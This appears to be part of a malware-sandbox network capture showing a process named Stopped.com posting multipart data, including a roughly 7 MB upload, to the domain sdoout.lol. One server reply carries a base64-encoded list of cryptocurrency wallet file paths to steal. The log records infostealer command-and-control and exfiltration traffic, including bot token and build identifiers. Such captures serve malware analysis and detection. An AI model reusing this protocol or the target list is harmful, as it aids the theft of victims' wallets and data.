                                                                                                                                                                                                                                                                                            2024-12-31 15:59:32 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:32 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:33 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:33 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:33 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                            Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            39192.168.2.564419116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:33 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----4790zmg479hvai5f3ecb
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 6990993
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:33 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 34 37 39 30 7a 6d 67 34 37 39 68 76 61 69 35 66 33 65 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 34 37 39 30 7a 6d 67 34 37 39 68 76 61 69 35 66 33 65 63 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 34 37 39 30 7a 6d 67 34 37 39 68 76 61 69 35 66 33 65 63 62 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------4790zmg479hvai5f3ecbContent-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------4790zmg479hvai5f3ecbContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------4790zmg479hvai5f3ecbCont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:33 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:40 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            40192.168.2.564421116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:34 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----phv3ek6fknop8ym7ymop
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:34 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 70 68 76 33 65 6b 36 66 6b 6e 6f 70 38 79 6d 37 79 6d 6f 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 70 68 76 33 65 6b 36 66 6b 6e 6f 70 38 79 6d 37 79 6d 6f 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 70 68 76 33 65 6b 36 66 6b 6e 6f 70 38 79 6d 37 79 6d 6f 70 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------phv3ek6fknop8ym7ymopContent-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------phv3ek6fknop8ym7ymopContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------phv3ek6fknop8ym7ymopCont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:35 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:35 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                                                            Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                            41192.168.2.564425116.203.14.4443904C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\164676\Stopped.com
                                                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:35 UTC275OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=----s2va1no8glnymy58gl6f
                                                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                                                            Host: sdoout.lol
                                                                                                                                                                                                                                                                                            Content-Length: 331
                                                                                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:35 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 73 32 76 61 31 6e 6f 38 67 6c 6e 79 6d 79 35 38 67 6c 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 30 37 62 33 30 34 39 34 61 32 33 39 66 64 33 36 37 63 66 64 38 34 61 37 33 37 33 63 61 66 39 0d 0a 2d 2d 2d 2d 2d 2d 73 32 76 61 31 6e 6f 38 67 6c 6e 79 6d 79 35 38 67 6c 36 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 73 32 76 61 31 6e 6f 38 67 6c 6e 79 6d 79 35 38 67 6c 36 66 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                            Data Ascii: ------s2va1no8glnymy58gl6fContent-Disposition: form-data; name="token"807b30494a239fd367cfd84a7373caf9------s2va1no8glnymy58gl6fContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------s2va1no8glnymy58gl6fCont
                                                                                                                                                                                                                                                                                            2024-12-31 15:59:36 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                                                            Date: Tue, 31 Dec 2024 15:59:36 GMT
                                                                                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                            Connection: close
